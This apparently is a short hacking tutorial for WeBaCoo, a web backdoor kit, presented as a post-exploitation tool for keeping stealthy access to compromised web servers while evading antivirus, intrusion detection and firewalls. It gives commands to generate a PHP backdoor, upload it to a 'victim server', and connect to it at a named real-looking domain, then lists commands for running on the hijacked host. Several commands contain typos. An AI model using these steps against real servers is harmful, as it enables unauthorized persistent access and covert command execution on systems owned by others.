WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool capable to maintain access to a compromised web server. WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute system commands to the compromised server. The obfuscated communication is accomplished using HTTP header’s Cookie fields under valid client HTTP requests and relative web server’s responses.
First Download webacoo script from here on your desktop
Now unzip the file unzip webacoo.zip
Now Type Command: ./webcoo.pl –g –o webdoor.php
This will generate code for a backdoor (-g) Generate backdoor code (-o is required). Here is a screenshot of the command terminal view:
Now upload that file in victim server, after uploading it, copy the URL of your uploaded file. Then type following command:
. / webacoo.pl -t -u http://telecallerjobs.com/webdoor.php
Ls – List information about the FILEs (the current directory by default)
Uname –a – print all information
Free – display information about free and used memory on the system
pwd – print name of current/working directory
Df – displays the amount of disk space available on the filesystem containing each file name argument
W – Displays information about the users currently on the machine, and their processes.
route – show / manipulate the IP routing table
Load – Load machine code and initialize new commands.
Download – Download file from server
Cat – cat to view the file, we see only the normal text